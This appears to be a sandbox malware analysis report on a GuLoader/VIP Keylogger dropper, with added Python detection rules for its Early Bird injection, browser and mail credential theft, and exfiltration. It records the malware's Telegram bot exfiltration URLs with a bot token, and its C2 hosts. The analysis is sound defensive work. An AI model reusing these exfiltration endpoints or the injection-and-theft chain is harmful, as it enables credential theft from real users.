Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
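The four powershell.exe entries at the top of this section are the Early Bird APC injection chain in order: msiexec.exe is created (suspended), the payload is written into it at base 0x42E0000, an APC is queued on its initial thread, and the thread is resumed so the APC runs before msiexec's own entry point. Sysmon does not record QueueUserAPC or ResumeThread, so on an endpoint the observable proxy is the parent opening its freshly spawned child with write and thread-control rights. The correlator below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling. The events are constructed and simplified Sysmon-style records (EventID 1 ProcessCreate, EventID 10 ProcessAccess) using Sysmon's field names; PIDs and timestamps are made up except for msiexec's PID 8012, which the report lists. The hollow-host list is an assumed seed, taken from the target seen here.

```python
from datetime import datetime, timedelta

# Standard Windows process access rights (winnt.h).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
PROCESS_SUSPEND_RESUME = 0x0800
WRITE_RIGHTS = PROCESS_VM_OPERATION | PROCESS_VM_WRITE            # needed to plant the payload
CONTROL_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_SUSPEND_RESUME   # needed to queue the APC / resume

# Binaries commonly launched with no arguments purely to host injected code.
# Assumed seed list (the target seen in this report); extend for your environment.
HOLLOW_HOSTS = {"msiexec.exe"}

# Constructed, simplified Sysmon-style events. Not telemetry from this analysis.
EVENTS = [
    {"EventID": 1, "UtcTime": "2024-01-01 00:00:01.000", "ProcessId": 8012,
     "Image": "C:\\Windows\\SysWOW64\\msiexec.exe",
     "CommandLine": "\"C:\\Windows\\SysWOW64\\msiexec.exe\"",
     "ParentProcessId": 4444,
     "ParentImage": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"EventID": 10, "UtcTime": "2024-01-01 00:00:01.250",
     "SourceProcessId": 4444,
     "SourceImage": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
     "TargetProcessId": 8012, "TargetImage": "C:\\Windows\\SysWOW64\\msiexec.exe",
     "GrantedAccess": "0x1FFFFF"},
    # Benign: an interactive installer launch with arguments.
    {"EventID": 1, "UtcTime": "2024-01-01 00:05:00.000", "ProcessId": 5120,
     "Image": "C:\\Windows\\System32\\msiexec.exe",
     "CommandLine": "\"C:\\Windows\\System32\\msiexec.exe\" /i setup.msi",
     "ParentProcessId": 3000, "ParentImage": "C:\\Windows\\explorer.exe"},
    # Benign: query-only handle (0x1000 = PROCESS_QUERY_LIMITED_INFORMATION).
    {"EventID": 10, "UtcTime": "2024-01-01 00:05:00.100",
     "SourceProcessId": 3000, "SourceImage": "C:\\Windows\\explorer.exe",
     "TargetProcessId": 5120, "TargetImage": "C:\\Windows\\System32\\msiexec.exe",
     "GrantedAccess": "0x1000"},
]


def _t(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def _name(path):
    return path.rsplit("\\", 1)[-1].lower()


def correlate_early_bird(events, window=timedelta(seconds=30)):
    """Flag a parent that spawns a child and, within `window`, opens it with
    memory-write plus thread-control rights. The bare command line of a known
    hollow host is added as a second reason when present."""
    created = {}   # child pid -> its ProcessCreate event
    alerts = []
    for ev in sorted(events, key=lambda e: _t(e["UtcTime"])):
        if ev["EventID"] == 1:
            created[ev["ProcessId"]] = ev
            continue
        if ev["EventID"] != 10:
            continue
        child = created.get(ev["TargetProcessId"])
        if not child or child["ParentProcessId"] != ev["SourceProcessId"]:
            continue
        if _t(ev["UtcTime"]) - _t(child["UtcTime"]) > window:
            continue
        granted = int(ev["GrantedAccess"], 16)
        if granted & WRITE_RIGHTS != WRITE_RIGHTS or not granted & CONTROL_RIGHTS:
            continue
        reasons = ["parent_writes_child_memory", "parent_holds_thread_control_rights"]
        bare = child["CommandLine"].strip().strip('"').lower() == child["Image"].lower()
        if bare and _name(child["Image"]) in HOLLOW_HOSTS:
            reasons.append("bare_hollow_host_launch")
        alerts.append({"parent": _name(ev["SourceImage"]), "parent_pid": ev["SourceProcessId"],
                       "child": _name(child["Image"]), "child_pid": child["ProcessId"],
                       "granted_access": hex(granted), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in correlate_early_bird(EVENTS):
        print(alert)
```

The rights check deliberately requires both halves: a parent that only writes (a debugger or crash handler) or only suspends (a job-control tool) does not fire, while a 0x1FFFFF (PROCESS_ALL_ACCESS) handle from the creator of a bare msiexec.exe does. Pair the alert with the network signatures in this report (msiexec.exe, a .NET-free installer host, talking to the Telegram API) for a confident verdict.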

Stealing of Sensitive Information

Source: Yara match | File source: 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 8012, type: MEMORYSTR
Source: Yara match | File source: 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: Yara match | File source: 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 8012, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 8012, type: MEMORYSTR
Source: Yara match | File source: 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
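The two sections above, read together with the process tree, are the chain a defender has to catch: powershell.exe (launched by the NSIS installer) starts C:\Windows\SysWOW64\msiexec.exe and injects into it, msiexec.exe then opens the Chrome, Edge and Postbox credential stores, and the same process talks to api.telegram.org and checkip.dyndns.com. The Python below is an added example, not code from the Joe Sandbox report or from Joe Security: it replays that chain over constructed endpoint events and raises one alert per stage, then correlates "read a credential store" with "contacted exfiltration infrastructure" on the same PID. The event schema (the type/image/parent_image/path/dest_host fields), the full PowerShell path, the list of legitimate store owners and the injection-target names other than msiexec.exe are assumptions; the file paths, hosts, IPs and PIDs 7528/8012 come from the report.

```python
"""Added example (not part of the Joe Sandbox report): replay the credential-theft
and exfiltration chain this report documents over constructed endpoint events."""

# Lower-cased path fragments for the browser/mail stores the sample opened (from the report).
CREDENTIAL_STORE_MARKERS = (
    r"\user data\default\login data",
    r"\user data\default\network\cookies",
    r"\user data\default\history",
    r"\user data\default\web data",
    r"\user data\default\top sites",
    r"\postboxapp\profiles",
)
# Processes that legitimately open those stores (assumption: this list is mine).
STORE_OWNERS = {"chrome.exe", "msedge.exe", "postbox.exe"}
# Hosts the injected msiexec.exe contacted (from the report) plus the dynamic-DNS
# suffixes and port seen in its memory strings.
EXFIL_HOSTS = {"api.telegram.org", "checkip.dyndns.com", "checkip.dyndns.org", "reallyfreegeoip.org"}
DYNDNS_SUFFIXES = (".duckdns.org", ".kozow.com", ".dns.army")
ODD_PORT = 8081
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
# msiexec.exe is the injection target in this report; the other names are my additions.
INJECTION_TARGETS = {"msiexec.exe", "regasm.exe", "regsvcs.exe", "installutil.exe"}

RULE_SPAWN = "script_host_spawned_injection_target"
RULE_STORE = "non_owner_opened_credential_store"
RULE_EXFIL = "injection_target_contacted_exfil_host"

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"  # assumed full path
MSI = r"C:\Windows\SysWOW64\msiexec.exe"

# Constructed events mirroring the report's process tree and file/network activity.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 7528, "image": PS,
     "parent_image": r"C:\Users\user\Desktop\Justificante pago-09453256434687.exe"},
    {"type": "process_create", "pid": 8012, "image": MSI, "parent_image": PS},
    {"type": "file_open", "pid": 8012, "image": MSI,
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "file_open", "pid": 8012, "image": MSI,
     "path": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    {"type": "file_open", "pid": 4242,  # benign: the browser reading its own store
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "network_connect", "pid": 8012, "image": MSI,
     "dest_host": "api.telegram.org", "dest_ip": "149.154.167.220", "dest_port": 443},
    {"type": "network_connect", "pid": 8012, "image": MSI,
     "dest_host": "checkip.dyndns.com", "dest_ip": "158.101.44.242", "dest_port": 80},
    {"type": "network_connect", "pid": 1234,  # benign: Windows Update CRL traffic
     "image": r"C:\Windows\System32\svchost.exe",
     "dest_host": "ctldl.windowsupdate.com", "dest_ip": "13.107.246.63", "dest_port": 80},
]


def _basename(path):
    """Windows basename, case-folded; os.path.basename would not split '\\' on POSIX."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return one alert dict per matching event, in event order."""
    alerts = []
    for ev in events:
        proc = _basename(ev["image"])
        if ev["type"] == "process_create":
            parent = _basename(ev["parent_image"])
            if proc in INJECTION_TARGETS and parent in SCRIPT_HOSTS:
                alerts.append({"rule": RULE_SPAWN, "pid": ev["pid"], "detail": f"{parent} -> {proc}"})
        elif ev["type"] == "file_open":
            path = ev["path"].lower()
            if proc not in STORE_OWNERS and any(m in path for m in CREDENTIAL_STORE_MARKERS):
                alerts.append({"rule": RULE_STORE, "pid": ev["pid"], "detail": f"{proc} opened {ev['path']}"})
        elif ev["type"] == "network_connect":
            host = ev["dest_host"].lower()
            suspicious = host in EXFIL_HOSTS or host.endswith(DYNDNS_SUFFIXES) or ev.get("dest_port") == ODD_PORT
            if proc in INJECTION_TARGETS and suspicious:
                alerts.append({"rule": RULE_EXFIL, "pid": ev["pid"], "detail": f"{proc} -> {host}:{ev.get('dest_port')}"})
    return alerts


def chain_pids(alerts):
    """PIDs that both read a credential store and contacted exfil infrastructure."""
    rules_by_pid = {}
    for a in alerts:
        rules_by_pid.setdefault(a["pid"], set()).add(a["rule"])
    return {pid for pid, rules in rules_by_pid.items() if {RULE_STORE, RULE_EXFIL} <= rules}


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for a in found:
        print(a["pid"], a["rule"], a["detail"])
    print("credential theft + exfil on PIDs:", chain_pids(found))
```

The file-open rule is the one that separates this sample from browser noise: Chrome and Edge open their own Login Data constantly, so the rule keys on the process identity rather than the path alone. The network rule is deliberately narrow (only injection-prone hosts contacting the listed infrastructure) because msiexec.exe does have legitimate outbound traffic during installs.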
ATT&CK Matrix by tactic (the number in parentheses is the count the report shows on that technique; techniques without a number are the matrix's unflagged cells)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation (1); PowerShell (2); At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: DLL Side-Loading (1); Registry Run Keys / Startup Folder (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (311); Registry Run Keys / Startup Folder (1); Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Masquerading (11); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (311)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: File and Directory Discovery (2); System Information Discovery (14); Security Software Discovery (11); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Web Service (1); Ingress Tool Transfer (3); Encrypted Channel (21); Non-Application Layer Protocol (4); Application Layer Protocol (15); Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph (ID 1576296; sample: Justificante pago-09453256434687.exe; start date: 16/12/2024; architecture: WINDOWS; score: 100)

Legend (node types): Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet

Top-level nodes:
  DNS/IP: reallyfreegeoip.org; api.telegram.org; 4 other IPs or domains
  Signatures: Found malware configuration; Yara detected VIP Keylogger; Yara detected GuLoader; 5 other signatures
  reallyfreegeoip.org -> Tries to detect the country of the analysis system (by using the IP)
  api.telegram.org -> Uses the Telegram API (likely for C&C communication)

Process tree:
  Justificante pago-09453256434687.exe (started; node counters: 1, 33)
    Dropped: C:\Users\user\...\Forhaandsudtalelses.Pot162 (Unicode); C:\Users\user\AppData\Local\...\nsExec.dll (PE32)
    Signatures: Suspicious powershell command line found
    -> powershell.exe (started; node counter: 30)
         Dropped: C:\...\Justificante pago-09453256434687.exe (PE32)
         Signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 3 other signatures
         -> msiexec.exe (started; node counters: 15, 8)
              DNS/IP: api.telegram.org 149.154.167.220, ports 443, 49806, 49825, TELEGRAMRU, United Kingdom; checkip.dyndns.com 158.101.44.242, ports 49738, 49742, 49750, ORACLE-BMC-31898US, United States; 3 other IPs or domains
              Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
         -> conhost.exe (started)

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Source | Detection | Scanner
Justificante pago-09453256434687.exe | 8% | ReversingLabs

Source | Detection | Scanner
C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes\Justificante pago-09453256434687.exe | 8% | ReversingLabs
C:\Users\user\AppData\Local\Temp\nsj887A.tmp\nsExec.dll | 0% | ReversingLabs
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 172.217.19.174 | true | false | - | high
drive.usercontent.google.com | 142.250.181.1 | true | false | - | high
reallyfreegeoip.org | 104.21.67.152 | true | false | - | high
api.telegram.org | 149.154.167.220 | true | false | - | high
checkip.dyndns.com | 158.101.44.242 | true | false | - | high
checkip.dyndns.org | unknown | unknown | false | - | high
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20and%20Time:%2017/12/2024%20/%2019:35:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20065367%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | - | high
https://reallyfreegeoip.org/xml/8.46.123.189 | false | - | high
http://checkip.dyndns.org/ | false | - | high
https://api.telegram.org/bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234817354&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery | false | - | high
https://api.telegram.org/bot7884953123:AAF1UbV49cF9gYVrnfCw9g9ZbVXhB325bSM/sendDocument?chat_id=5234817354&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.office.com/ | msiexec.exe, 00000006.00000002.2936459320.0000000021C66000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021C57000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org | msiexec.exe, 00000006.00000002.2936459320.0000000021C18000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot | msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://translate.google.com/translate_a/element.js | msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.microsoft | powershell.exe, 00000001.00000002.2046362099.00000000008F2000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20a | msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.office.com/lB | msiexec.exe, 00000006.00000002.2936459320.0000000021C61000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/Icon | powershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://drive.usercontent.google.com/ | msiexec.exe, 00000006.00000003.2194212584.0000000005F3A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2924097464.0000000005F36000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://checkip.dyndns.org | msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | msiexec.exe, 00000006.00000002.2937418489.0000000022E15000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B4E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022BC3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CF2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022D40000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B9C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://nsis.sf.net/NSIS_ErrorError | Justificante pago-09453256434687.exe, Justificante pago-09453256434687.exe.1.dr | false | - | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | msiexec.exe, 00000006.00000002.2937418489.0000000022E15000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B4E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022BC3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CF2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022D40000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B9C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot/sendMessage?chat_id=&text= | msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://chrome.google.com/webstore?hl=en | msiexec.exe, 00000006.00000002.2936459320.0000000021C35000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021C66000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B7C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://varders.kozow.com:8081 | msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://aborters.duckdns.org:8081 | msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.google.com | msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://51.38.247.67:8081/_send_.php?L | msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/pscore6lB | powershell.exe, 00000001.00000002.2053769821.00000000049C1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://drive.google.com/ | msiexec.exe, 00000006.00000002.2924097464.0000000005ECA000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://anotherarmy.dns.army:8081 | msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | msiexec.exe, 00000006.00000002.2937418489.0000000022B29000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CF8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022DF0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B54000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CCD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B9E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.2053769821.0000000004B16000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.2056661315.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://chrome.google.com/webstore?hl=enlB | msiexec.exe, 00000006.00000002.2936459320.0000000021C30000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://reallyfreegeoip.org/xml/8.46.123.189$ | msiexec.exe, 00000006.00000002.2936459320.0000000021AEA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://reallyfreegeoip.org | msiexec.exe, 00000006.00000002.2936459320.0000000021AC0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B30000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021B57000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://apis.google.com | msiexec.exe, 00000006.00000003.2139339110.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2139283272.0000000005F3E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | msiexec.exe, 00000006.00000002.2937418489.0000000022B29000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CF8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022DF0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B54000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022CCD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2937418489.0000000022B9E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://api.telegram.org | msiexec.exe, 00000006.00000002.2936459320.0000000021C18000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.2053769821.00000000049C1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2936459320.0000000021A71000.00000004.00000800.00020000.00000000.sdmp | false | - | high
